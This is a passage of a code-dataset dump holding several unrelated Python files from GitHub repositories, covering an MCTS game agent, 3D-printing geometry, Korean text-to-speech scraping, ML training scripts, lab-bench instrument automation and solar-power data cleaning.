p=probas)]\n\n # Perform the next simulation. Using [select_branch], find a node that's either terminal or needs exploration.\n self.current_simulation += 1\n moves = self.current_tree_node.moves()\n\n while moves:\n # We know this has to run at least once, because we don't put any nodes in the tree unless they have\n # at least two move choices.\n assert len(moves) > 1\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Selecting a branch for {self.current_tree_node.game_state.action_stack.first.__class__} with moves {moves}')\n move = self.select_branch(self.current_tree_node)\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Selected move {move}')\n if self.current_tree_node.has_child(move):\n logger.debug(f'Child exists, so taking a step down the tree')\n self.current_tree_node = self.current_tree_node.children[move]\n moves = self.current_tree_node.moves()\n else:\n break\n\n if not self.current_tree_node.game_state.is_over():\n # If we're not at a terminal state, apply the move from the last branch we selected and make a new node\n # from it. We're going to need to get predictions before we can finish creating the node, so save all\n # necessary state.\n new_state = play.apply_move(self.current_tree_node.game_state, move)\n legal_moves = new_state.legal_moves()\n while not new_state.is_over() and (not legal_moves or len(legal_moves) == 1):\n new_state = play.apply_move(new_state, None) if not legal_moves \\\n else play.apply_move(new_state, legal_moves[0])\n legal_moves = new_state.legal_moves()\n if new_state.is_over():\n # Predictions give us a value and a pdf, but now we know the value and we don't need a pdf because\n # there are no moves left. Create a new node, propagate terminal values and proceed to the next\n # simulation.\n values = {\n faction_name: 1 if faction_name is self.current_tree_node.game_state.winner else 0\n for faction_name in self.current_tree_node.game_state.player_idx_by_faction_name.keys()}\n self.current_tree_node = Node.from_state(new_state, values, parent=self.current_tree_node,\n last_move=move, priors={})\n return self.handle_terminal_state()\n else:\n self.pending_game_state_and_choices_and_move = new_state, legal_moves, move\n self.send_encodings_to_evaluator(new_state)\n return MCTSZeroAgentManual.Result.PREDICTIONS_NEEDED, None\n else:\n return self.handle_terminal_state()\n\n def decode_predictions_and_propagate_values(self):\n # We've got some predictions, which means we can create a new node (maybe the root)\n # and propagate values up the tree (if this is not the root). Once we do that, we're ready\n # to start the next simulation, so reset the current tree node to the root.\n assert self.pending_game_state_and_choices_and_move is not None\n game_state, choices, move = self.pending_game_state_and_choices_and_move\n values, move_priors = model.to_values_and_move_priors(game_state, choices, self.view.preds[self.env_slot])\n self.view.write_preds_clean(self.env_slot)\n self.current_tree_node = Node.from_state(game_state, values, parent=self.current_tree_node, last_move=move,\n priors=move_priors)\n if self.current_tree_root is None:\n self.current_tree_root = self.current_tree_node\n else:\n self.current_tree_node.propagate_values()\n self.pending_game_state_and_choices_and_move = None\n self.current_tree_node = self.current_tree_root","repo_name":"danben/ScytheBot","sub_path":"agents/mcts_zero.py","file_name":"mcts_zero.py","file_ext":"py","file_size_in_byte":22325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13770137637","text":"\"\"\"\nCubic vertexes.\n\nFrom:\nhttp://www.w3.org/TR/SVG/paths.html#PathDataCubicBezierCommands\n\n\"\"\"\n\nfrom __future__ import absolute_import\n#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.\nimport __init__\n\nfrom fabmetheus_utilities.geometry.creation import lineation\nfrom fabmetheus_utilities.geometry.geometry_utilities import evaluate\nfrom fabmetheus_utilities.vector3 import Vector3\nfrom fabmetheus_utilities import svg_reader\n\n\n__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'\n__credits__ = 'Art of Illusion '\n__date__ = \"$Date: 2008/02/05 $\"\n__license__ = 'GPL 3.0'\n\n\ndef getCubicPath(xmlElement):\n\t\"Get the cubic path.\"\n\tend = evaluate.getVector3FromXMLElement(xmlElement)\n\tpreviousXMLElement = xmlElement.getPreviousXMLElement()\n\tif previousXMLElement == None:\n\t\tprint('Warning, can not get previousXMLElement in getCubicPath in cubic for:')\n\t\tprint(xmlElement)\n\t\treturn [end]\n\tbegin = xmlElement.getPreviousVertex(Vector3())\n\tevaluatedControlPoints = evaluate.getTransformedPathByKey('controlPoints', xmlElement)\n\tif len(evaluatedControlPoints) > 1:\n\t\treturn getCubicPathByBeginEnd(begin, evaluatedControlPoints, end, xmlElement)\n\tcontrolPoint0 = evaluate.getVector3ByPrefix(None, 'controlPoint0', xmlElement)\n\tcontrolPoint1 = evaluate.getVector3ByPrefix(None, 'controlPoint1', xmlElement)\n\tif len(evaluatedControlPoints) == 1:\n\t\tcontrolPoint1 = evaluatedControlPoints[0]\n\tif controlPoint0 == None:\n\t\toldControlPoint = evaluate.getVector3ByPrefixes(['controlPoint','controlPoint1'], None, previousXMLElement)\n\t\tif oldControlPoint == None:\n\t\t\toldControlPoints = evaluate.getTransformedPathByKey('controlPoints', previousXMLElement)\n\t\t\tif len(oldControlPoints) > 0:\n\t\t\t\toldControlPoint = oldControlPoints[-1]\n\t\tif oldControlPoint == None:\n\t\t\toldControlPoint = end\n\t\tcontrolPoint0 = begin + begin - oldControlPoint\n\treturn getCubicPathByBeginEnd(begin, [controlPoint0, controlPoint1], end, xmlElement)\n\ndef getCubicPathByBeginEnd(begin, controlPoints, end, xmlElement):\n\t\"Get the cubic path by begin and end.\"\n\treturn svg_reader.getCubicPoints(begin, controlPoints, end, lineation.getNumberOfBezierPoints(begin, end, xmlElement))\n\ndef processXMLElement(xmlElement):\n\t\"Process the xml element.\"\n\txmlElement.parent.object.vertexes += getCubicPath(xmlElement)\n","repo_name":"makerbot/ReplicatorG","sub_path":"skein_engines/skeinforge-35/fabmetheus_utilities/geometry/geometry_tools/path_elements/cubic.py","file_name":"cubic.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":397,"dataset":"github-code","pt":"3"}
+{"seq_id":"23945172756","text":"from google.cloud import texttospeech\nfrom bs4 import BeautifulSoup\n\nimport pandas as pd\nimport requests\nimport re\n\n\ndef get_hangeul():\n\n # Scrape the website and get list of titles\n url = 'https://www.bbc.com/korean/popular/read'\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n titles = soup.findAll('span', \n {'class': 'most-popular-list-item__headline'})\n \n # Iterate through titles -> remove punctuation -> append to the list\n result = []\n for title in titles:\n title = re.sub(r'[^\\w\\s]','',title.text)\n words = title.split()\n result += words\n \n # Return the unique words\n return set(result)\n\ndef create_audio(text, language='ko-KR'):\n\n # Instantiates a client\n client = texttospeech.TextToSpeechClient()\n\n # Set the text input to be synthesized\n synthesis_input = texttospeech.types.SynthesisInput(text=text)\n\n # Build the voice request, select the language code (\"ko-KR\") and the ssml\n # voice gender (\"neutral\")\n voice = texttospeech.types.VoiceSelectionParams(\n language_code=language,\n ssml_gender=texttospeech.enums.SsmlVoiceGender.NEUTRAL)\n\n # Select the type of audio file you want returned\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3)\n\n # Perform the text-to-speech request on the text input with the selected\n # voice parameters and audio file type\n response = client.synthesize_speech(synthesis_input, voice, audio_config)\n\n # The response's audio_content is binary.\n with open('audio/{}.mp3'.format(text), 'wb') as out:\n # Write the response to the output file.\n out.write(response.audio_content)\n\nif __name__ == \"__main__\":\n\n # Get list of korean words and get the audio for each word\n words = get_hangeul()\n\n for word in words:\n create_audio(word)\n\n # Create the dataframe of words and save it as .csv file\n dictionary = pd.DataFrame(words, columns=['word'])\n dictionary.to_csv('dictionary.csv', index=False)\n","repo_name":"dzakyputra/hangeulbot","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"32580105044","text":"import sqlite3\nimport pandas as pd\n\n# Connect to the SQLite database\ntry:\n conn = sqlite3.connect('ijadataset.db')\n cursor = conn.cursor()\nexcept Exception as e:\n print(f\"Error connecting to the database: {e}\")\n exit(1)\n\n# Prepare the SQL query\nquery = '''\n SELECT V.pairid, M1.size AS method1_size, M2.size AS method2_size\n FROM verifiedpairs V\n JOIN pairs P ON V.pairid = P.id\n JOIN methods M1 ON P.leftMethodID = M1.id\n JOIN methods M2 ON P.rightMethodID = M2.id\n WHERE V.consensus = 1\n ORDER BY V.pairid ASC\n'''\n\ntry:\n # Execute the query and fetch the results\n cursor.execute(query)\n results = cursor.fetchall()\n\n # Create a list of dictionaries to hold the data\n data_list = []\n for index, pair in enumerate(results, start=1):\n pair_num = index\n method1_size = pair[1]\n method2_size = pair[2]\n data_list.append({'Pair Number': pair_num, 'Method1 Size': method1_size, 'Method2 Size': method2_size})\n\n # Convert the list of dictionaries to a DataFrame\n data = pd.DataFrame(data_list)\n\n # Save the DataFrame to an Excel file\n data.to_excel('method_sizes.xlsx', index=False)\n\n print(\"Data saved to 'method_sizes.xlsx'.\")\nexcept Exception as e:\n print(f\"Error while fetching or processing data: {e}\")\nfinally:\n # Close the database connection\n conn.close()\n","repo_name":"PongphopLp/ScriptAutorepair","sub_path":"ExtractSqlite/save_size.py","file_name":"save_size.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42566504155","text":"from keras.applications.vgg16 import VGG16\nfrom keras.preprocessing import image\nfrom keras.models import Model\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras import backend as K\nimport warnings\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import SGD\nimport os\nwarnings.filterwarnings(\"ignore\")\n# We only test DenseNet-121 in this script for demo purpose\n#from densenet169 import DenseNet\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n# im = cv2.resize(cv2.imread('data/train/dogs/dog.251.jpg'), (224, 224)).astype(np.float32)\n# dimensions of our images.\nimg_width, img_height = 224, 224\n\ntrain_data_dir = 'skirt_length/data/train'\nvalidation_data_dir = 'skirt_length/data/validation'\n\n# used to rescale the pixel values from [0, 255] to [0, 1] interval\ndatagen = ImageDataGenerator(rescale=1./255)\ntrain_generator = datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=16,\n class_mode='categorical')\n\nvalidation_generator = datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=32,\n class_mode='categorical')\n\n# create the base pre-trained model\nbase_model = VGG16(weights='imagenet', include_top=False)\n\n# add a global spatial average pooling layer\nx = base_model.output\nx = GlobalAveragePooling2D()(x)\n# let's add a fully-connected layer\nx = Dense(64, activation='relu')(x)\n# and a logistic layer -- let's say we have 200 classes\npredictions = Dense(6, activation='softmax')(x)\n\nmodel = Model(inputs=base_model.input, outputs=predictions)\n\n# for layer in base_model.layers:\n# layer.trainable = False\n\n# compile the model (should be done *after* setting layers to non-trainable)\nsgd = SGD(lr=1e-2, decay=1e-6, momentum=0.9, nesterov=True)\nmodel.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n#model.compile(optimizer='rmsprop', loss='categorical_crossentropy')\n\nnb_epoch = 1\nnb_train_samples = 512\nnb_validation_samples = 256\n\nmodel.fit_generator(\n train_generator,\n samples_per_epoch=nb_train_samples,\n nb_epoch=nb_epoch,\n )\n# out = model.predict(im)\n\nmodel.save('models/vgg16_skirt_v2.h5')\n","repo_name":"XSilverBullet/fashionAI","sub_path":"finetune_vgg16.py","file_name":"finetune_vgg16.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"773066293","text":"# 하루 동안의 습도 정보가 저장된 csv파일을 읽어 학습한 뒤 w와 b 값을 csv에 저장합니다.\nimport tensorflow as tf\nimport time\nimport csv\nimport pandas as pd\nimport numpy as np\n\n# LinearRegression 함수를 정의합니다.\n# setp: 몇 번 학습 반복할지 / lr: alpha / dadta: csv 파일을 읽은 데이터프레임\ndef LinearRegression(step, lr, df): \n # time에 0부터 lr 크기까지의 정수를 저장합니다.\n time = np.arange(0, len(df), 1)\n # df를 data에 저장합니다.\n data = df\n \n # x축엔 time을 y축은 data가 되도록합니다.\n x_data = time\n y_data = data\n\n\n b_initial = data[0]\n w_initial = (data[1] - data[0])\n\n b = tf.Variable(b_initial)\n w = tf.Variable(w_initial)\n\n b_result = 0\n w_result = 0\n\n learnig_rate = lr\n\n for i in range(0, step):\n with tf.GradientTape() as tape:\n\n hypothesis = w * x_data + b\n \n cost = tf.reduce_mean(tf.square(hypothesis - y_data))\n\n w_grad, b_grad = tape.gradient(cost, [w, b])\n \n w.assign_sub(learnig_rate * w_grad)\n b.assign_sub(learnig_rate * b_grad)\n\n w_result = w.numpy()\n b_result = b.numpy()\n \n \n return w_result, b_result\n\n\ndfData = pd.read_csv(\"humTime.csv\", header = None)\n\n# 데이터프레임 형식인 dfData의 첫번째 열의 0행부터 5번째 행까지를 list 형식으로 바꿔서 LinearRegression 함수에 넘겨준다.\nw_am, b_am = LinearRegression(30,0.01,dfData.iloc[:6, 1].tolist())\n\n# 데이터프레임 형식인 dfData의 첫번째 열의 6번째 행부터 마지막 행까지를 list형식으로 바꿔서 LinearRegression 함수에 넘겨��다.\nw_pm, b_pm = LinearRegression(30,0.01,dfData.iloc[6:, 1].tolist())\n\nprint(w_am, b_am)\nprint(w_pm, b_pm)\n\n# result.csv파일에 w, b를 저장합니다.\nresult = {'w': [w_am, w_pm], 'b': [b_am, b_pm]}\n# result를 pandas의 데이터프레임 형식으로 바꿔 result_pd에 저장합니다.\nresult_pd = pd.DataFrame(result)\n# result_pd를 csv 파일로 저장합니다.\nresult_pd.to_csv('result.csv', index = False)\n","repo_name":"WoodoLee/KUGifted","sub_path":"SmartEcoSystem/7th/csv_write_wb.py","file_name":"csv_write_wb.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71378649680","text":"\"\"\"IMPORT DEPENDENCIES\"\"\"\nfrom time import time, sleep\nimport sys\nimport os\nimport math\nfrom powi.equipment import ACSource, PowerMeter, ElectronicLoad, Oscilloscope, LEDControl\nfrom powi.equipment import headers, create_folder, footers, waveform_counter, soak, convert_argv_to_int_list, tts, prompt\nfrom filemanager import path_maker, remove_file\nimport winsound as ws\nfrom playsound import playsound\nwaveform_counter = 0\n\nfrom datetime import datetime\nnow = datetime.now()\ndate = now.strftime('%Y_%m_%d')\t\n\n##################################################################################\n\n\"\"\"COMMS\"\"\"\nac_source_address = 5\nsource_power_meter_address = 1 \nload_power_meter_address = 2\neload_address = 8\nscope_address = \"10.125.10.184\"\n\n\"\"\"USER INPUT\"\"\"\nvin_list = [120,230]\n\ntest = input(\"Enter test name: \")\n\n\n\"\"\"DO NOT EDIT BELOW THIS LINE\"\"\"\n##################################################################################\n\n\"\"\"EQUIPMENT INITIALIZE\"\"\"\nac = ACSource(ac_source_address)\npms = PowerMeter(source_power_meter_address)\npml = PowerMeter(load_power_meter_address)\neload = ElectronicLoad(eload_address)\nscope = Oscilloscope(scope_address)\n\n\ndef scope_settings():\n \"\"\"CHANNEL SETTINGS\"\"\"\n scope.channel_settings(state='ON', channel=1, scale=100, position=-1, label=\"Input Voltage\", color='YELLOW', rel_x_position=20, bandwidth=20, coupling='AC', offset=0)\n scope.channel_settings(state='ON', channel=2, scale=2, position=3, label=\"ZCD_IN\", color='ORANGE', rel_x_position=40, bandwidth=20, coupling='DCLimit', offset=0)\n scope.channel_settings(state='ON', channel=3, scale=1, position=-1, label=\"RelayON Pulse\", color='LIGHT_BLUE', rel_x_position=60, bandwidth=20, coupling='DCLimit', offset=0)\n scope.channel_settings(state='ON', channel=4, scale=2, position=-4, label=\"Q1 Regulator\", color='PINK', rel_x_position=80, bandwidth=20, coupling='DCLimit', offset=0)\n \n \"\"\"MEASURE SETTINGS\"\"\"\n scope.measure(1, \"MAX,RMS,FREQ\")\n scope.measure(2, \"MAX,MIN\")\n scope.measure(3, \"MAX,MIN\")\n scope.measure(4, \"MAX,MIN\")\n\n \"\"\"HORIZONTAL SETTINGS\"\"\"\n scope.time_position(10)\n scope.record_length(50E6)\n scope.time_scale(1)\n\n \"\"\"ZOOM SETTINGS\"\"\"\n scope.remove_zoom()\n # scope.add_zoom(rel_pos=21.727, rel_scale=1)\n \n \"\"\"TRIGGER SETTINGS\"\"\"\n trigger_channel =2\n trigger_level = 1\n trigger_edge = 'POS'\n scope.edge_trigger(trigger_channel, trigger_level, trigger_edge)\n\n\n scope.stop()\n sleep(2)\n\ndef operation():\n global waveform_counter\n \n scope_settings()\n \n for vin in vin_list:\n\n scope.run_single()\n sleep(3)\n\n ac.voltage = vin\n ac.turn_on()\n\n sleep(3)\n print(\"Turn switch on\")\n sleep(3)\n\n sleep(4)\n ac.turn_off()\n\n # scope.add_zoom(rel_pos=42.972, rel_scale=1)\n # input(\"Adjust startup cursor\")\n # scope.add_zoom(rel_pos=21.727, rel_scale=1)\n input(\"Capture waveform?\")\n\n filename = f'{test}, {vin}Vac, {ac.frequency}Hz.png'\n waveforms_folder = f'C:/Users/ccayno/Desktop/DER-867 LNK-TNZ ONOFF Switch/Test Data/{date}/{vin}Vac_{ac.frequency}Hz'\n path = path_maker(f'{waveforms_folder}')\n scope.get_screenshot(filename, path)\n print(filename)\n waveform_counter += 1\n \n \n capturing_condition = input(\"Press ENTER to continue capture waveform. Press anything else to stop capturing waveforms. \")\n i = 1\n while capturing_condition == '':\n filename = f'{test}, {vin}Vac, {ac.frequency}Hz, ({i}).png'\n waveforms_folder = f'C:/Users/ccayno/Desktop/DER-867 LNK-TNZ ONOFF Switch/Test Data/{date}/{vin}Vac_{ac.frequency}Hz'\n path = path_maker(f'{waveforms_folder}')\n scope.get_screenshot(filename, path)\n print(filename)\n waveform_counter += 1\n i += 1\n capturing_condition = input(\"Press ENTER to continue capture waveform. Press anything else to stop capturing waveforms. \")\n\n\n\n\n\ndef main():\n global waveform_counter\n operation()\n \nif __name__ == \"__main__\":\n headers(test)\n main()\n footers(waveform_counter)","repo_name":"charlescayno/bench_automation","sub_path":"misc_codes/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39574793683","text":"import os\n\nimport requests\nimport json\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\nOPENWEATHERMAP_API_KEY = os.environ.get('OPENWEATHERMAP_API_KEY')\nHOME_LATITUDE = os.environ.get('HOME_LATITUDE')\nHOME_LONGITUDE = os.environ.get('HOME_LONGITUDE')\n\n\ndef get_outdoor_temperature() -> float:\n url = f\"https://api.openweathermap.org/data/2.5/weather?\" \\\n f\"lat={HOME_LATITUDE}&lon={HOME_LONGITUDE}&appid={OPENWEATHERMAP_API_KEY}&units=metric\"\n response = requests.get(url)\n data = json.loads(response.text)\n return float(data['main']['temp'])\n","repo_name":"w13rny/thermoptify","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31557996504","text":"from crs import db_manager, make_db\nfrom crs.settings import DB_NAME, DB_TEST\nimport os\n\n\ndef pytest_funcarg__manager(request):\n\n def setup():\n path = os.path.dirname(os.path.realpath(__file__))\n make_db.create_db(path)\n m = db_manager.Manager(DB_TEST)\n return m\n\n def cleanup(m):\n os.remove(DB_TEST)\n\n return request.cached_setup(\n setup=setup,\n teardown=cleanup,\n scope='session')\n\n\ndef test__normalize_db_input(manager):\n test_inp = manager._normalize_db_input('This', 'input is', 5, 'elements', 'long')\n assert test_inp == ['This', 'input is', '5', 'elements', 'long']\n\n\ndef test_show_movies(manager):\n count_movies = 0\n for x in manager.show_movies():\n count_movies += 1\n assert count_movies == 3\n\n\ndef test_select_moviname_by_id(manager):\n assert manager.select_moviename_by_id(1) == 'The Intern'\n assert manager.select_moviename_by_id(2) == 'Sicario'\n assert manager.select_moviename_by_id(3) == 'The Martian'\n\n\ndef test_show_movie_proj_by_id(manager):\n details = manager.show_movie_proj_by_id(1)\n assert len(details) == 1\n details = manager.show_movie_proj_by_id(2)\n assert len(details) == 2\n details = manager.show_movie_proj_by_id(3)\n assert len(details) == 2\n\n\ndef test_check_id_validity(manager):\n result = manager.check_id_validity('PROJECTIONS', 5)\n assert result is True\n result = manager.check_id_validity('MOVIES', 4)\n assert result is False\n\n\ndef test_show_movie_projections(manager):\n movie_projections_no_date = 0\n for x in manager.show_movie_projections(2):\n movie_projections_no_date += 1\n assert movie_projections_no_date == 2\n\n movie_projections_with_date = 0\n for x in manager.show_movie_projections(2, '2015-11-01'):\n movie_projections_with_date += 1\n assert movie_projections_with_date == 0\n\n\ndef test_show_number_of_seats(manager):\n assert manager.show_number_of_seats(1) == 100\n assert manager.show_number_of_seats(2) == 100\n assert manager.show_number_of_seats(3) == 100\n assert manager.show_number_of_seats(4) == 100\n assert manager.show_number_of_seats(5) == 100\n\n\ndef test_make_reservation(manager):\n manager.make_reservation('Ivo', 4, 3, 5)\n assert manager.show_number_of_seats(4) == 99\n\n\ndef test_get_reserved_seats_for_projection(manager):\n result = manager.get_reserved_seats_for_projection(4)\n for r in result:\n assert r == (3, 5)\n","repo_name":"ivelintod/Random-Code","sub_path":"CRS/crs/test/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39820121840","text":"import pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import RobustScaler\nimport numpy as np\n\n#scaler = StandardScaler()\nscaler = MinMaxScaler()\n#scaler = RobustScaler()\ndef remove_repeating(df):\n # Assuming df is your DataFrame and y_c is defined elsewhere\n\n # Set df to y_c\n\n # Convert 'time' column to datetime if it's not already\n # Add a helper column to identify shifts in 'pv_measurement' value and same day check\n df['shifted_pv'] = df['pv_measurement'].shift().bfill()\n df['same_day'] = df['time'].dt.date == df['time'].shift().dt.date\n\n # Identify rows where the value is the same as the previous one and is on the same day\n df['same_as_prev'] = (df['pv_measurement'] == df['shifted_pv']) & df['same_day']\n\n # Create a group identifier for consecutive identical measurements within the same day\n df['group'] = (~df['same_as_prev']).cumsum()\n\n # Prepare a DataFrame to collect periods to remove\n indices_to_remove = []\n\n # Process each group and determine if it should be removed\n for name, group in df.groupby(['group', df['time'].dt.date]):\n duration_hours = (group['time'].iloc[-1] - group['time'].iloc[0]).total_seconds() / 3600\n duration_count = len(group)\n value = group['pv_measurement'].iloc[0]\n if value != 0 and duration_hours > 3:\n # For non-zero values repeated for more than 3 hours\n indices_to_remove.extend(group.index)\n elif value == 0 and duration_count == 24:\n # For zero values repeated for all 24 hours of the same day\n indices_to_remove.extend(group.index)\n\n # Create a new DataFrame without the repeated periods\n df_cleaned = df.drop(indices_to_remove)\n\n # Drop the helper columns from the new DataFrame\n df_cleaned.drop(['shifted_pv', 'same_day', 'same_as_prev', 'group'], axis=1, inplace=True)\n\n return df_cleaned\n\ndef drop_repeating_sequences_and_return_y_with_droped_indixes(df):\n indexes_to_drop = set() # Change this to a set to avoid duplicates\n prev_val = None\n consecutive_count = 0\n y_with_indexes_to_drop = df.copy()\n\n for i, val in enumerate(df[\"pv_measurement\"]):\n if val != 0:\n if val == prev_val:\n consecutive_count += 1\n else:\n prev_val = val\n consecutive_count = 0\n\n if consecutive_count >= 1:\n indexes_to_drop.add(i - consecutive_count) # Add to set to ensure uniqueness\n indexes_to_drop.add(i) # Add to set to ensure uniqueness\n \n # Convert the set to a sorted list to use for indexing\n indexes_to_drop = sorted(indexes_to_drop)\n \n # Create the DataFrame without the dropped indices\n df_without_dropped = df.drop(indexes_to_drop)\n \n # Create the DataFrame with only the dropped indices\n df_with_only_dropped = df.loc[indexes_to_drop]\n\n return df_without_dropped, df_with_only_dropped\n\n\ndef delete_ranges_of_zeros_and_interrupting_values_and_return_y_with_dropped_indices(df, number_of_recurring_zeros, interrupting_values=[]):\n count = 0\n drop_indices = []\n\n # Store the original DataFrame to reinsert NaN values later\n original_df = df.copy()\n\n # Get the indices of the NaN values\n nan_indices = df[df['pv_measurement'].isna()].index.tolist()\n if len(nan_indices) > 0:\n print(\"penis\")\n # Drop the NaN values for processing zeros and interrupting values\n df = df.dropna()\n\n for index, row in df.iterrows():\n if row[\"pv_measurement\"] == 0 or row[\"pv_measurement\"] in interrupting_values:\n count += 1\n else:\n if count > number_of_recurring_zeros:\n drop_indices.extend(df.index[index - count:index])\n count = 0\n\n if count > number_of_recurring_zeros:\n drop_indices.extend(df.index[index - count + 1:index + 1])\n \n # Convert the set to a sorted list to use for indexing\n indexes_to_drop = sorted(drop_indices)\n \n # Create the DataFrame without the dropped indices\n df_without_dropped = df.drop(indexes_to_drop)\n \n # Combine drop_indices with nan_indices to get all indices to be dropped\n all_drop_indices = sorted(set(drop_indices + nan_indices))\n\n # Create the DataFrame with only the dropped indices\n df_with_only_dropped = original_df.loc[all_drop_indices]\n \n return df_without_dropped, df_with_only_dropped #, df_with_only_dropped (uncomment if needed)\n\ndef drop_long_sequences_and_return_y_with_dropped_indices(df, x):\n indexes_to_drop = []\n zero_count = 0\n\n for i, val in enumerate(df['pv_measurement']):\n if val == 0:\n zero_count += 1\n else:\n if zero_count >= x:\n start_index = i - zero_count\n end_index = i - 1 # inclusive\n if start_index >= 0 and end_index < len(df):\n indexes_to_drop.extend(list(range(start_index, end_index + 1)))\n zero_count = 0\n\n # In case the sequence ends with zeros, this will handle it\n if zero_count >= x:\n start_index = len(df) - zero_count\n end_index = len(df) - 1\n if start_index >= 0 and end_index < len(df):\n indexes_to_drop.extend(list(range(start_index, end_index + 1)))\n\n # Create a dataframe with only the dropped rows\n df_with_only_dropped = df.loc[df.index[indexes_to_drop]].copy()\n\n # Drop the rows from the original dataframe\n df_dropped = df.drop(df.index[indexes_to_drop])\n \n return df_dropped, df_with_only_dropped\n\n#gustav sitt\ndef agumenting_time(df):\n df[\"new_time\"] = pd.to_datetime(df['date_forecast'])\n df['hour'] = df['new_time'].dt.hour\n df['minute'] = df['new_time'].dt.minute\n #df[\"day\"] = df['new_time'].dt.day\n df[\"month\"] = df['new_time'].dt.month\n df['time_decimal'] = df['hour'] + df['minute'] / 60.0\n phase_adjustment = (np.pi/2) - 11 * (2 * np.pi / 24)\n df['hour_sin'] = np.sin(df['time_decimal'] * (2. * np.pi / 24) + phase_adjustment)\n df['hour_cos'] = np.cos(df['time_decimal'] * (2. * np.pi / 24) + phase_adjustment)\n df = df.drop(columns = [\"new_time\"])\n return df\n\ndef direct_rad_div_diffuse_rad(df):\n df['dif_dat_rad'] = 0.0\n condition = df['diffuse_rad:W'] != 0\n df.loc[condition, 'dif_dat_rad'] = df.loc[condition, 'direct_rad:W'] / df.loc[condition, 'diffuse_rad:W']\n return df\n\ndef get_hyperparameters_for_rf(x_observed, x_estimated, y, selected_features ):\n X_train = pd.concat([clean_df(x_observed, selected_features), clean_df(x_estimated, selected_features)])\n X_train, y_train = resize_training_data(X_train,y)\n # Define the parameter grid\n param_grid = {\n 'n_estimators': [50, 100, 200],\n 'max_depth': [None, 10, 20, 30],\n 'min_samples_split': [2, 5, 10],\n 'min_samples_leaf': [1, 2, 4]\n }\n\n # Create a Random Forest Regressor\n rf = RandomForestRegressor(random_state=42)\n\n # Create the scorer\n scorer = make_scorer(mean_absolute_error, greater_is_better=False)\n\n # Create the grid search\n grid_search = GridSearchCV(estimator=rf, param_grid=param_grid, scoring=scorer, cv=5)\n\n # Fit the grid search\n grid_search.fit(X_train, y_train[\"pv_measurement\"])\n\n # Get the best parameters\n best_params = grid_search.best_params_\n print(f\"Best parameters b: {best_params}\")\n return best_params\n\n#gammelt under\n\n\ndef date_forecast_to_time(df):\n df['month'] = df['date_forecast'].dt.month\n df['hour'] = df['date_forecast'].dt.hour\n df['day'] = df['date_forecast'].dt.day\n \n df['hour_sin'] = np.sin(df['hour'] * (2. * np.pi / 24))\n df['hour_cos'] = np.cos(df['hour'] * (2. * np.pi / 24))\n df['month_sin'] = np.sin((df['month']-1) * (2. * np.pi / 12))\n df['month_cos'] = np.cos((df['month']-1) * (2. * np.pi / 12))\n return df\n \n#Scales all the feature value in a way they take a simmilar range\ndef scale_df(df, fit):\n if fit:\n scaled_array = scaler.fit_transform(df)\n else:\n scaled_array = scaler.transform(df)\n \n # Convert the scaled array back into a pandas DataFrame\n scaled_df = pd.DataFrame(scaled_array, index=df.index, columns=df.columns)\n return scaled_df\n\n#Removes all features from a df except selected_features\ndef clean_df(df, selected_features):\n return df[selected_features]\n\n#Function which resizes the training data such that only the rows with the same date and time for weather is kept.\n#X_train is either observed or forcasted weather and y_train is how much energy is produced. \n#y_features are a list containing the column names of y_train\n#X_date_feature is the feature name which the date and time for the weather is savew. This will probably always be \"date_forecast\" and may be changed\ndef resize_training_data(X_train, y_train):\n y_features = y_train.columns.tolist()\n X_date_feature = \"date_forecast\"\n \n merged = pd.merge(X_train, y_train,left_on=X_date_feature, right_on='time', how='inner')\n y_train_resized = merged[y_features]\n columns_to_drop = y_features + [X_date_feature]\n X_train_resized = merged.drop(columns = columns_to_drop)\n return X_train_resized, y_train_resized\n \n#Splits the training data such that it is training set is observed and some estimated, valid is some estimated and test is some estimated\ndef training_data_split(X_observed_clean, X_estimated_clean_mean):\n X_train_estimated = X_estimated_clean_mean[:int(X_estimated_clean_mean.shape[0] * 3 / 4)]\n X_valid = X_estimated_clean_mean[int(X_estimated_clean_mean.shape[0] * 3 / 4):int(X_estimated_clean_mean.shape[0] * 9 / 10)]\n X_test = X_estimated_clean_mean[int(X_estimated_clean_mean.shape[0] * 9 / 10):]\n \n X_train = pd.concat([X_observed_clean, X_train_estimated])\n return X_train, X_valid, 